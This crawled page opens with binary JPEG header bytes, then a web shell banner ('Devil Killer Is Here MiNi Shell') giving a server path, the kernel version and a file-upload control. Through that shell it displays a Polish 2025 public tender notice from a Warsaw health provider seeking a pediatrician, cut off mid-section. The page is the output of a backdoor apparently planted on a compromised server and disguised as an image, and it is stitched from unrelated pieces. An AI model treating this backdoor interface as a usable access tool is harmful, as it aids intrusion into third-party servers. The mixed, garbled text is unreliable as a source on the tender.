JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250206/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250206/0009346201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Udzielanie świadczeń zdrowotnych w zakresie należącym do zadań lekarza POZ - pediatry w SZPZLO Warszawa Praga-Północ” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Zespół Publicznych Zakładów Lecznictwa Otwartego Warszawa Praga-Północ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000311415</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jagiellońska 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-719</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22-619-62-98</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@szpzlo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpzlo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Udzielanie świadczeń zdrowotnych w zakresie należącym do zadań lekarza POZ - pediatry w SZPZLO Warszawa Praga-Północ” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-296f2e09-92e4-49b9-b8a8-4aa6ca8c321f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00093462</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00061837/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 „Udzielanie świadczeń zdrowotnych w zakresie należącym do zadań lekarza POZ - pediatry w SZPZLO Warszawa Praga-Północ” - w okresie 34 miesięcy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szpzlo.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami w niniejszym postępowaniu<br/>odbywać się będzie przy użyciu środków komunikacji elektronicznej, tj. platforma (Marketplanet): https://szpzlo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca przystępując do<br/>niniejszego postępowania o udzielenie zamówienia akceptuje warunki korzystania z w/w platformy i obowiązujących Regulaminów<br/>dostępnych na stronie https://oneplace.marketplanet.pl/regulamin. Wymagania techniczne i organizacyjne sporządzenia, wysyłania i<br/>odbierania korespondencji elektronicznej opisane zostały w instrukcji dla wykonawcy dostępnej na platformie pod linkiem:<br/>https://szpzlo.ezamawiajacy.pl/servlet/HomeServlet?<br/>MP_action=publicFilesList&amp;folder=002c&amp;clientName=szpzlo&amp;MP_module=main. Wykonawca składający ofertę w formie<br/>elektronicznej, musi posiadać konto na Platformie e- Zamawiający (Marketplanet), wówczas<br/>ma dostęp do formularzy: złożenia, zmiany, wycofania oferty. Zamawiający rekomenduje podpisywanie plików w formacie pdf.<br/>formatem PAdES, a dokumenty w innym formacie niż pdf formatem XAdES. Oferta powinna być sporządzona w języku polskim, z<br/>zachowaniem postaci elektronicznej w formacie danych .doc, .docx, .xls, .xlsx, .pdf i podpisana podpisem podpisana kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Postać elektroniczna obejmuje przekazanie<br/>Zamawiającemu oferty składającej się z dokumentów/oświadczeń/formularzy w takiej formie w jakiej zostały utworzone i<br/>udostępnione przez Zamawiającego tj. dokumentu w postaci elektronicznej. Sposób sporządzenia oraz sposób przekazywania ofert,<br/>oświadczeń, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków<br/>dowodowych, oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu o udzielenie zamówienia,<br/>wymagania techniczne dla dokumentów elektronicznych, wymagania techniczne i organizacyjne użycia środków komunikacji<br/>elektronicznej służące do odbioru dokumentów elektronicznych jak również sposób ich sporządzenia określa Rozporządzenie<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>(Dz.U. z 2020 r. poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679 Samodzielny Zespół Publicznych<br/>Zakładów Lecznictwa Otwartego Warszawa - Praga Północ (dalej: SZP ZLO Warszawa Praga - Północ), informuje, iż: 1)<br/>administratorem Pani/Pana danych osobowych (zwanym dalej administratorem”) jest SZPZLO Warszawa - Praga Północ,<br/>reprezentowany przez Dyrektora, z którym można się kontaktować na adres jego siedziby lub adres e-mail: sekretariat@szpzlo.pl, 2)<br/>administrator powołał Inspektora Ochrony Danych (IOD), który nadzoruje prawidłowość przetwarzania Pana/Pani danych<br/>osobowych. Z Inspektorem Ochrony Danych Osobowych można skontaktować pod adresem pocztowym SZP ZLO Warszawa -<br/>Praga Północ (z adnotacją skierowania sprawy do IOD) lub za pośrednictwem adresu e-mail: iod@szpzlo.pl, 3) Pani/Pana dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem oraz udzielaniem<br/>informacji związanych z niniejszym postępowaniem, 4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja niniejszego postępowania na podstawie ustawy Pzp oraz pracownicy Administratora<br/>zobowiązani do przeprowadzenia postępowania o udzielenie zamówienia publicznego, 5) Pani/Pana dane osobowe będą<br/>wykorzystywane w celach związanych z przeprowadzeniem niniejszego postępowania o udzielenie zamówienia udzielaniem<br/>informacji na jego temat oraz w celu ewentualnego zawarcia umowy, 6) Pani/Pana dane osobowe będą przechowywane, zgodnie z<br/>art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,7)obowiązek podania przez Panią/Pana danych<br/>osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp,8) w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO, 9) posiada<br/>Pani/Pan:a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,b) na podstawie art. 16<br/>RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników),c) na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>(prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze<br/>środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego), d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 3. nie<br/>przysługuje Pani/Panu: 1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych, 2) prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO,3) na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób<br/>fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający<br/>pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z włączeń, o<br/>których mowa w art. 14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zebrane w wyniku toczącego się postępowania dane osobowe mogą zostać<br/>wykorzystane do realizacji zadań związanych z przeprowadzeniem, zakończeniem, rejestracją i archiwizacją niniejszego<br/>postępowania. Zamawiający nie jest zobowiązany do indywidualnego informowania wszystkich osób, których dane zostaną<br/>pozyskane w trakcie prowadzenia procedury lub w związku z jej prowadzeniem po jej zakończeniu. Skorzystanie przez osobę, której<br/>dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą Pzp. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tego postępowania. W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych<br/>danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679. W przypadku korzystania przez<br/>osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1-3<br/>rozporządzenia 2016/679, Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. Skorzystanie przez osobę,<br/>której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16<br/>rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego załączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZPiZ.2620.07.ZP.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: udzielanie świadczeń zdrowotnych w zakresie lekarza POZ - pediatry na rzecz Samodzielnego Zespołu Publicznych Zakładów Lecznictwa Otwartego Warszawa Praga- Północ. <br/>2.	Miejsce udzielania świadczeń: stacjonarnie na rzecz Samodzielnego Zespołu Publicznych Zakładów Lecznictwa Otwartego Warszawa Praga- Północ a w szczególności w Przychodni Rodzinnej przy ul. Otwockiej 1 w Warszawie.<br/>3.	W zakres przedmiotu zamówienia wchodzi w szczególności: <br/>	udzielanie świadczeń zdrowotnych przez lekarza POZ w zakresie pediatrii (minimum 1 stopień specjalizacji) w rodzaju Podstawowej Opieki Zdrowotnej;<br/>	wykonywanie czynności służących zachowaniu, przywracaniu lub poprawie zdrowia, które w szczególności polegają na leczeniu i sprawowaniu opieki nad pacjentami, <br/>4.	Świadczenia zdrowotne udzielane będą adekwatnie do aktualnego stanu zapotrzebowania. <br/>5.	Wykonawca ma zagwarantować swoją dostępność minimum 4 godziny dziennie, 5 dni w tygodniu.<br/>6.	Szczegółowy zakres przedmiotu zamówieni Wykonawca zobowiązany jest zrealizować na zasadach i warunkach opisanych w Projektowanych postanowieniach umowy stanowiących załącznik Nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85100000-0 - Usługi ochrony zdrowia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85121200-5 - Specjalistyczne usługi medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">34 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/>1. Cena oferty (C) 60 pkt.<br/>2. Jakość (J) 40 pkt.<br/>Razem: 100pkt.<br/>2. Sposób oceny<br/>1) Kryterium Nr 1 –„Cena” (C)<br/>- ocena ceny przedmiotu zamówienia będzie dokonywana poprzez porównanie danych zawarty w ofertach do ceny najniższej wśród<br/>zaproponowanych. Punkty za kryterium będą obliczone wg wzoru:<br/>najniższa cena brutto*<br/>spośród wszystkich ofert podlegających ocenie<br/>C - ----------------------------------------------------------- x 60 pkt = Ilość punktów<br/>wartość brutto oferty badanej<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>- obliczona liczba punktów dla oferty złożonej przez danego Wykonawcę wynikająca<br/>ze wzoru zostanie zaokrąglona do dwóch miejsc po przecinku.<br/>2) Kryterium Nr 2 –„Jakość” (J)<br/>- Zamawiający dokona oceny na podstawie oświadczenia Wykonawcy złożonego zgodnie z Wykazem osób - Załącznik Nr 9 do<br/>SWZ. Zamawiającego postawił warunek w zakresie doświadczenia osób skierowanych do realizacji zamówienia określając go na<br/>minimum 5 lat doświadczenia w specjalności lekarza medycyny pracy. W przypadku zadeklarowania doświadczenia poniżej<br/>minimalnych 5 lat, oferta Wykonawcy zostanie odrzucona jako niezgodna z warunkami SWZ.<br/> Wykonawca może otrzymać maksymalnie 40 pkt, jeżeli oświadczy, że posiada doświadczenie:<br/>5 lat – 0 pkt,<br/>5 – 7 lat – 20 pkt,<br/>8 – 10 lat – 30 pkt,<br/>powyżej 10 lat – 40 pkt.<br/>3. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą sumę punktów wyliczoną w oparciu o wzór:<br/>Pł = Pi(C) + Pi(J)<br/> gdzie:<br/>Pi – łączna ocena punktowa badanej oferty „i”<br/>Pi(C) - liczba punktów, jakie otrzyma badana oferta „i” za kryterium (C)<br/>Pi(J) - liczba punktów, jakie otrzyma badana oferta „i” za kryterium (J)<br/>4. O wyborze najkorzystniejszej oferty zadecyduje najwyższa liczba punktów uzyskanych łącznie za kryteria 1- 2.<br/>5. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów<br/>w kryterium: „Cena” + „Jakość”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym o ile wynika to z odrębnych przepisów - na potwierdzenie tego warunku Wykonawcy muszą posiadać:<br/>a)	dokumenty stwierdzające posiadane kwalifikacje (dyplom, tytuł naukowy, specjalizacja, inne dokumenty potwierdzające kwalifikacje i doświadczenie zawodowe,<br/>b)	dokument potwierdzający prawo wykonywania zawodu (aktualny odpis z właściwego rejestru w Okręgowej Izbie Lekarskiej),<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej - Zamawiający nie określa tego warunku; <br/>3)	sytuacji ekonomicznej lub finansowej - na potwierdzenie tego warunku Wykonawcy muszą posiadać:<br/>a)	ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, minimalna kwota ubezpieczenia w zakresie udzielonego zamówienia musi być zgodna z wymogami Rozporządzenia Ministra Finansów z dnia 29 kwietnia 2019 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej podmiotu wykonującego działalność leczniczą (Dz.U. <br/>z 2019 r. poz. 866),<br/>4)	zdolności technicznej lub zawodowej - na potwierdzenie tego warunku Wykonawcy muszą posiadać: <br/>minimum 5 letnie doświadczenie zawodowe w specjalizacji lekarza pediatry (minimum 1 stopień specjalizacji) . <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenie Wykonawcy o braku przynależności do tej samej grupy kapitałowej – Załącznik Nr 4 do SWZ.<br/>3.	W zakresie podstawy wykluczenia określonej w art. 108 ust. 1 pkt 1 Pzp zgodnie z § 2 ust. 1 pkt. 2 rozporządzenia w sprawie podmiotowych środków dowodowych:<br/>1)	zaświadczenie z Krajowego Rejestru Karnego (w zakresie przestępstw określonych w rozdziale XIX i XXV Kodeksu karnego, w art.189a i art.207 Kodeksu karnego oraz w ustawie z dnia 29 lipca 2005 r. o przeciwdziałaniu narkomanii lub za odpowiadające tym przestępstwom czyny zabronione określone w przepisach prawa obcego), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w postępowaniu. <br/>4.	W zakresie podstawy wykluczenia: zgodnie z art. 22 ustawy z dnia 13 kwietnia 2022 r. <br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji <br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507): <br/>1)	Oświadczenie, o przeciwdziałaniu wspierania agresji na Ukrainę przepisy „sankcyjne” – Załącznik Nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych 